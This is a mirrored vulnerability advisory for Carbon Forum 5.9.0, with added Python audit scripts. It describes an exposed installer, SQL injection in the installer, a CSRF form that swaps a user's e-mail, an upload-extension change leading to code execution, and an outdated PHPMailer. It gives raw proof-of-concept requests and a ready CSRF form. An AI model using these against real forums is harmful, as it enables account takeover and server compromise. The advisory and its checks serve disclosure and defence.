Carbon Forum 5.9.0 Cross Site Request Forgery / SQL Injection
Published 2024-06-24; mirror of https://packetstormsecurity.com/files/179193/carbonforum590-sqlxsrf.txt

{-} Title => Carbon Forum 5.9.0 - Multiple Exploits
{-} Author => bRpsd [cy@Live.no]
{-} Date Release => 22 June, 2024
{-} Vendor => Carbon Forum
Homepage => https://www.94cb.com/
Download => https://github.com/lincanbin/Carbon-Forum
Vulnerable Versions => <= 5.9.0
Tested Version => 5.9.0 on an XAMPP server.

#######################################################################################
Vulnerability #1 : Reset Administrator Password & Database settings
File Path: http://localhost/Carbon-Forum/install/
INFO: The install/ directory is left in place after installation and keeps accepting requests. Anyone who can reach it can re-run the installer against a new database (any host and credentials they choose, see #2) and then register the first user on the fresh installation, which is the account the installer makes administrator. The result is an administrator account on the site, and from there the authenticated upload in #4 is one step away.
Check: a GET to /install/ on a deployed site must not return the installer form; delete the directory (or block it in the web server) once installation has finished.
#######################################################################################

#######################################################################################
Vulnerability #2 : SQL Injection
Vulnerable Code: /Carbon-Forum/install/index.php
The installer takes the database settings straight from $_POST. The SCHEMATA lookup is parameterised, but $DBName is then concatenated unescaped into the CREATE DATABASE statement:

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $fp = fopen(__DIR__ . '/database.sql', "r") or die("SQL文件无法打开。 The SQL File could not be opened.");
    //dobefore
    if (isset($_POST["Language"]) && isset($_POST["DBHost"]) && isset($_POST["DBName"]) && isset($_POST["DBUser"]) && isset($_POST["DBPassword"])) {
        $Language = $_POST['Language'];
        $DBHost = $_POST['DBHost'];
        $DBName = $_POST['DBName'];
        $DBUser = $_POST['DBUser'];
        $DBPassword = $_POST['DBPassword'];
        $SearchServer = $_POST['SearchServer'];
        $SearchPort = $_POST['SearchPort'];
        $EnableMemcache = $_POST['EnableMemcache'];
        $MemCachePrefix = $_POST['MemCachePrefix'];
    } else {
        die("An Unexpected Error Occured!");
    }
    //$WebsitePath = $_POST['WebsitePath'];
    $WebsitePath = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
    if (preg_match('/(.*)\/install/i', $WebsitePath, $WebsitePathMatch)) {
        $WebsitePath = $WebsitePathMatch[1];
    } else {
        $WebsitePath = '';
    }
    // initialise the database access class
    require('../library/PDO.class.php');
    $DB = new Db($DBHost, 3306, '', $DBUser, $DBPassword);
    $DatabaseExist = $DB->single("SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME = :DBName", array('DBName' => $DBName));
    if (empty($DatabaseExist)) {
        $DB->query("CREATE DATABASE IF NOT EXISTS " . $DBName . ";");   // $DBName concatenated unescaped
    }

POC Request:
POST http://localhost/Carbon-Forum/install/?
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/x-www-form-urlencoded
Content-Length: 173
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/Carbon-Forum/install/
Cookie: CarbonBBS_View=desktop; CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; PHPSESSID=addf2aa242dcb91d00faf41e6d6b07b3
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Language=en&DBHost=localhost&DBName=&DBUser=test'&DBPassword=&SearchServer=&SearchPort=&EnableMemcache=false&MemCachePrefix=carbon_&submit=安 装 / Install

Response:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1
You can find the error back in the log.

Note: the 1064 response is produced by the empty DBName, not by the quote in DBUser. With DBName= the concatenated statement becomes CREATE DATABASE IF NOT EXISTS ; which is exactly the "syntax ... near '' at line 1" MariaDB reports, while DBUser is only passed to PDO as a connection credential. DBName is the injectable parameter: it is looked up with a bound parameter and then concatenated unescaped into CREATE DATABASE. Keep the impact in proportion: the installer connects with the DBHost/DBUser/DBPassword the attacker supplies, so injected SQL runs with those credentials, and hitting the site's real database needs valid credentials for it (on a stock XAMPP install root has no password). The exposure that matters is that the installer is reachable at all (#1).
#######################################################################################

################################################################################################################
Vulnerability #3 : CSRF - Change a user's e-mail address
File Path: http://localhost/Carbon-Forum/settings
Method: POST
Parameter: UserMail
Code: Carbon-Forum/controller/settings.php

The UpdateUserInfo handler reads the profile fields straight from the POST body and saves them. There is no anti-CSRF token and no Origin/Referer check, so any page a logged-in user visits can submit this form on their behalf:

case 'UpdateUserInfo':
    $CurUserInfo['UserSex'] = intval(Request('POST', 'UserSex', 0));
    $CurUserInfo['UserMail'] = IsEmail(Request('POST', 'UserMail', $CurUserInfo['UserMail'])) ? Request('POST', 'UserMail', $CurUserInfo['UserMail']) : $CurUserInfo['UserMail'];
    $CurUserInfo['UserHomepage'] = CharCV(Request('POST', 'UserHomepage', $CurUserInfo['UserHomepage']));
    $CurUserInfo['UserIntro'] = CharCV(Request('POST', 'UserIntro', $CurUserInfo['UserIntro']));
    $UpdateUserInfoResult = UpdateUserInfo(array(
        'UserSex' => $CurUserInfo['UserSex'],
        'UserMail' => $CurUserInfo['UserMail'],
        'UserHomepage' => $CurUserInfo['UserHomepage'],
        'UserIntro' => $CurUserInfo['UserIntro']));
    if ($UpdateUserInfoResult) {
        $UpdateUserInfoMessage = $Lang['Profile_Modified_Successfully'];

POC (host this page anywhere and get a logged-in user to load it; the browser submits the form with the victim's CarbonBBS_* cookies and the account's e-mail address is replaced):

<form method='POST' action='http://localhost/Carbon-Forum/settings'>
<input type="hidden" name="Action" value="UpdateUserInfo">
<input type="hidden" name="UserSex" value="0">
<input type="hidden" name="UserMail" value="changed@new-email.com">
<input type="hidden" name="UserHomepage" value="">
<input type="hidden" name="UserIntro" value="">
<input type='submit' value='submit'>
</form>

Note: the PoC was captured with Firefox. Chromium-based browsers treat a cookie with no SameSite attribute as Lax and do not attach it to a cross-site POST (apart from a short grace period after the cookie is set), so against those browsers the session cookie would have to be set with SameSite=None. Once the e-mail address is attacker-controlled, any password-recovery flow that mails the user is in the attacker's hands. The fix is a per-session token in every state-changing form, verified server-side before UpdateUserInfo() is called.
################################################################################################################
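The two checks a deployer would want for #1 and #3 above, as an added example in Python (not part of the advisory and not Carbon Forum's own code): does a GET to install/ still return a form asking for the four database fields the installer reads from $_POST, and does the settings form carry any hidden token-like field alongside Action=UpdateUserInfo? The field names come from the advisory; the token-name heuristic (TOKEN_HINTS) and the two sample pages are assumptions constructed for the example.

```python
"""Offline audit helpers for a leftover installer and a token-less settings form."""
from html.parser import HTMLParser
from urllib.parse import urljoin
import urllib.request

INSTALLER_FIELDS = {"DBHost", "DBName", "DBUser", "DBPassword"}   # from the installer code
TOKEN_HINTS = ("token", "csrf", "nonce", "xsrf")   # assumed field-name hints, not from the project


class FormCollector(HTMLParser):
    """Collect every <form> with its method, action and <input> name/type/value."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"method": (a.get("method") or "get").lower(),
                             "action": a.get("action") or "",
                             "inputs": {}}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            name = a.get("name")
            if name:
                self._current["inputs"][name] = {
                    "type": (a.get("type") or "text").lower(),
                    "value": a.get("value") or "",
                }

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def parse_forms(html):
    parser = FormCollector()
    parser.feed(html)
    return parser.forms


def installer_exposed(html):
    """True if any POST form asks for all four DB settings, i.e. the installer still answers."""
    return any(f["method"] == "post" and INSTALLER_FIELDS <= set(f["inputs"])
               for f in parse_forms(html))


def forms_without_csrf_token(html):
    """Action values of POST forms that carry no hidden field whose name looks like a token."""
    missing = []
    for f in parse_forms(html):
        if f["method"] != "post":
            continue
        hidden = {n for n, i in f["inputs"].items() if i["type"] == "hidden"}
        if not any(any(h in n.lower() for h in TOKEN_HINTS) for n in hidden):
            missing.append(f["inputs"].get("Action", {}).get("value") or f["action"])
    return missing


def audit(base_url, timeout=10):
    """Run both checks against a live site (network; not exercised by the sample below)."""
    def get(path):
        with urllib.request.urlopen(urljoin(base_url, path), timeout=timeout) as r:
            return r.read().decode("utf-8", "replace")
    return {"installer_exposed": installer_exposed(get("install/")),
            "forms_without_csrf_token": forms_without_csrf_token(get("settings"))}


# Constructed sample pages, shaped after the fields the advisory shows; not copied from the product.
SAMPLE_INSTALL_PAGE = """<form method="POST" action="">
<input name="Language" value="en"><input name="DBHost" value="localhost">
<input name="DBName"><input name="DBUser"><input type="password" name="DBPassword">
<input type="submit" name="submit" value="Install"></form>"""

SAMPLE_SETTINGS_PAGE = """<form method="POST" action="/Carbon-Forum/settings">
<input type="hidden" name="Action" value="UpdateUserInfo">
<input name="UserMail" value="user@example.com"><input type="submit"></form>
<form method="POST" action="/Carbon-Forum/settings">
<input type="hidden" name="Action" value="Other">
<input type="hidden" name="CsrfToken" value="deadbeef"><input type="submit"></form>"""

if __name__ == "__main__":
    print("installer exposed:", installer_exposed(SAMPLE_INSTALL_PAGE))
    print("forms without a token:", forms_without_csrf_token(SAMPLE_SETTINGS_PAGE))
```

audit("http://localhost/Carbon-Forum/") runs the same two functions against a live copy; a non-empty forms_without_csrf_token result is a finding to confirm by hand, since a site may carry its token in a cookie-bound header rather than a hidden field.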
#######################################################################################
Vulnerability #4 : Arbitrary File Upload - RCE [Authenticated, administrator]
Info: The administrator can change the allowed upload extensions in dashboard -> Parameter. The UploadParameters field stores the UEditor configuration (config.json, comments included) as free text, and the *AllowFiles lists in it are the only thing standing between the editor's upload handlers and the web root. Adding an executable extension such as ".php" to fileAllowFiles lets a file be uploaded under /upload/file/ (the filePathFormat below), where it is served by the same web server; that is the code execution the title refers to. This needs an administrator session, so on its own it is an admin-to-code-execution hop; chained with #1 it is reachable by anyone who can see /install/.

The captured request below submits the stock configuration (no extension has been added yet). The #dashboard4 fragment in the URL is the dashboard tab and is never sent to the server. The body is shown URL-decoded with one field per line.

POC POST:
http://localhost/Carbon-Forum/dashboard#dashboard4
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/x-www-form-urlencoded
Content-Length: 14662
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/Carbon-Forum/dashboard
Cookie: CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; CarbonBBS_View=desktop
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Action=Parameter

UploadParameters=
/* Front-end/back-end communication settings; comments may only use the multi-line form */
{
    /* Image upload settings */
    "imageActionName": "uploadimage",        /* action name that performs the image upload */
    "imageFieldName": "upfile",              /* form field name of the submitted image */
    "imageMaxSize": 4096000,                 /* upload size limit, in bytes */
    "imageAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"],   /* image formats shown for upload */
    "imageCompressEnable": true,             /* whether to compress images, default true */
    "imageCompressBorder": 1600,             /* maximum long-edge length for compression */
    "imageInsertAlign": "none",              /* float style of the inserted image */
    "imageUrlPrefix": "",                    /* URL prefix for image access */
    "imagePathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}",   /* save path; path and file-name format can be customised */
        /* {filename} is replaced by the original file name; beware of garbled Chinese file names when using it */
        /* {rand:6} is replaced by a random number; the digit after the colon is its length */
        /* {time} is replaced by a timestamp */
        /* {yyyy} four-digit year, {yy} two-digit year, {mm} two-digit month, {dd} two-digit day */
        /* {hh} two-digit hour, {ii} two-digit minute, {ss} two-digit second */
        /* illegal characters: \ : * ? " < > | */
        /* see the online documentation for details: fex.baidu.com/ueditor/#use-format_upload_filename */

    /* Scrawl (doodle) image upload settings */
    "scrawlActionName": "uploadscrawl",      /* action name that performs the scrawl upload */
    "scrawlFieldName": "upfile",             /* form field name of the submitted image */
    "scrawlPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}",   /* save path; customisable */
    "scrawlMaxSize": 2048000,                /* upload size limit, in bytes */
    "scrawlUrlPrefix": "",                   /* URL prefix for image access */
    "scrawlInsertAlign": "none",
    "scrawlAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"],

    /* Screenshot tool upload */
    "snapscreenActionName": "uploadimage",   /* action name that performs the screenshot upload */
    "snapscreenPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}",   /* save path; customisable */
    "snapscreenUrlPrefix": "",               /* URL prefix for image access */
    "snapscreenInsertAlign": "none",         /* float style of the inserted image */

    /* Remote image fetching settings */
    "catcherLocalDomain": ["127.0.0.1", "localhost", "img.baidu.com"],
    "catcherActionName": "catchimage",       /* action name that fetches remote images */
    "catcherFieldName": "source",            /* form field name of the submitted image list */
    "catcherPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}",   /* save path; customisable */
    "catcherUrlPrefix": "",                  /* URL prefix for image access */
    "catcherMaxSize": 2048000,               /* upload size limit, in bytes */
    "catcherAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"],   /* fetched image formats shown */

    /* Video upload settings */
    "videoActionName": "uploadvideo",        /* action name that performs the video upload */
    "videoFieldName": "upfile",              /* form field name of the submitted video */
    "videoPathFormat": "/upload/video/{yyyy}{mm}{dd}/{time}{rand:6}",   /* save path; customisable */
    "videoUrlPrefix": "",                    /* URL prefix for video access */
    "videoMaxSize": 20480000,                /* upload size limit, in bytes, default 20 MB */
    "videoAllowFiles": [".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid"],   /* video formats shown */

    /* File upload settings */
    "fileActionName": "uploadfile",          /* action name in the controller that performs the upload */
    "fileFieldName": "upfile",               /* form field name of the submitted file */
    "filePathFormat": "/upload/file/{yyyy}{mm}{dd}/{time}{rand:6}",   /* save path; customisable */
    "fileUrlPrefix": "",                     /* URL prefix for file access */
    "fileMaxSize": 2048000,                  /* upload size limit, in bytes, default 2 MB */
    "fileAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml"],   /* file formats shown */

    /* List images in the given directory */
    "imageManagerActionName": "listimage",   /* action name for the image manager */
    "imageManagerListPath": "/upload/image/",   /* directory whose images are listed */
    "imageManagerListSize": 60,              /* number of files listed per request */
    "imageManagerUrlPrefix": "",             /* URL prefix for image access */
    "imageManagerInsertAlign": "none",       /* float style of the inserted image */
    "imageManagerAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"],   /* file types listed */

    /* List files in the given directory */
    "fileManagerActionName": "listfile",     /* action name for the file manager */
    "fileManagerListPath": "/upload/file/",  /* directory whose files are listed */
    "fileManagerUrlPrefix": "",              /* URL prefix for file access */
    "fileManagerListSize": 60,               /* number of files listed per request */
    "fileManagerAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml"]   /* file types listed */
}

TextFilterParameter=
/* Keyword-filter settings; comments may only use the multi-line form */
{
    /* Every keyword supports regular expressions; too many filters hurt performance
       "fuck" : "f**k",
       The rule above means content containing fuck is posted with it filtered to f**k
       "negro" : [false, 30],
       Don't issue text with "negro", or it will freeze for 30 seconds.
       "蛤" : [false, 30],
       The rule above forbids content containing "蛤", and a user who tries to post it is silenced for 30 seconds
       "negro" : ["black", 30],
       "包子" : ["维尼", 30],
       The rule above means content containing "包子" is filtered to "维尼", and after the post succeeds the user must wait another 30 seconds before posting again */
    /* "fuck" : "f**k", "negro" : [false, 30], "蛤" : [false, 30], "negro" : ["black", 30], "包子" : ["维尼", 30] */
}

submit=Save settings

#######################################################################################

#######################################################################################
Vulnerability #5 : Vulnerable PHPMailer library
File: /Carbon-Forum/library/PHPMailer.class.php
Version: $Version = '5.2.16';
Note: 5.2.16 predates the fixes for CVE-2016-10033 (fixed in 5.2.18) and CVE-2016-10045 (fixed in 5.2.20), the mail()-transport sender-injection bugs that lead to remote code execution, as well as the later 5.2.x fixes. The advisory only identifies the bundled version; whether any of these is reachable depends on how Carbon Forum uses the library (whether user-supplied addresses reach the sender and whether the mail() transport is in use), which is not examined here. Replacing the bundled copy with a current PHPMailer release is the fix either way.
#######################################################################################
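For #4 and #5 above, an added offline audit example in Python (not from the advisory and not Carbon Forum's code). The first part parses an UploadParameters value as UEditor-style JSON with /* */ comments, stripping the comments without touching string contents, and reports any *AllowFiles list that admits a server-executable extension. The second part reads the $Version constant out of PHPMailer.class.php and lists the PHPMailer advisories whose fix is newer than the bundled release. The executable-extension list and both sample inputs are assumptions made for the example; the fixed-in versions are taken from the PHPMailer changelog.

```python
"""Audit an UEditor upload configuration and a bundled PHPMailer version."""
import json
import re

# Extensions that commonly execute server-side under Apache/PHP (assumed list).
EXECUTABLE_EXT = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar"}


def strip_c_comments(text):
    """Remove /* ... */ comments but leave them alone inside JSON strings."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:       # keep the escaped character, including \"
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("/*", i):
            end = text.find("*/", i + 2)
            i = n if end < 0 else end + 1     # jump to the closing */ (unterminated: drop the rest)
        else:
            out.append(c)
        i += 1
    return "".join(out)


def dangerous_allow_lists(config_text):
    """Map every key ending in AllowFiles to the executable extensions it permits."""
    cfg = json.loads(strip_c_comments(config_text))
    hits = {}
    for key, val in cfg.items():
        if key.endswith("AllowFiles") and isinstance(val, list):
            bad = sorted(e for e in val if e.lower() in EXECUTABLE_EXT)
            if bad:
                hits[key] = bad
    return hits


# First PHPMailer 5.2.x release containing each fix, per the PHPMailer changelog.
PHPMAILER_FIXED_IN = {
    "CVE-2016-10033": (5, 2, 18),   # mail() sender injection -> RCE
    "CVE-2016-10045": (5, 2, 20),   # bypass of the 5.2.18 fix
    "CVE-2017-5223": (5, 2, 22),    # local file disclosure via msgHTML
    "CVE-2018-19296": (5, 2, 27),   # PHP object injection via addAttachment
}


def phpmailer_version(source):
    """Return the $Version constant from PHPMailer.class.php as a tuple, or None."""
    m = re.search(r"\$Version\s*=\s*['\"]([\d.]+)['\"]", source)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def phpmailer_advisories(source):
    """CVE ids whose fix is newer than the bundled version (None if no version found)."""
    v = phpmailer_version(source)
    if v is None:
        return None
    return [cve for cve, fixed in PHPMAILER_FIXED_IN.items() if v < fixed]


# Constructed samples: a trimmed configuration after an administrator appended ".php"
# and ".phtml", and a version line shaped like the one quoted in the advisory.
SAMPLE_UPLOAD_CONFIG = '''/* front/back-end communication settings */ {
    "imageAllowFiles": [".png", ".jpg"], /* shown as "image" formats */
    "fileActionName": "uploadfile",
    "fileAllowFiles": [".zip", ".pdf", ".php", ".phtml"] /* illegal chars: \\ : * ? " < > | */
}'''
SAMPLE_PHPMAILER_HEADER = "class PHPMailer\n{\n    public $Version = '5.2.16';\n"

if __name__ == "__main__":
    print(dangerous_allow_lists(SAMPLE_UPLOAD_CONFIG))
    print(phpmailer_advisories(SAMPLE_PHPMAILER_HEADER))
```

Run dangerous_allow_lists() over the value stored for UploadParameters (or over the POST body of a captured dashboard request) and phpmailer_advisories() over library/PHPMailer.class.php; an empty dict and an empty list are the expected results on a hardened install.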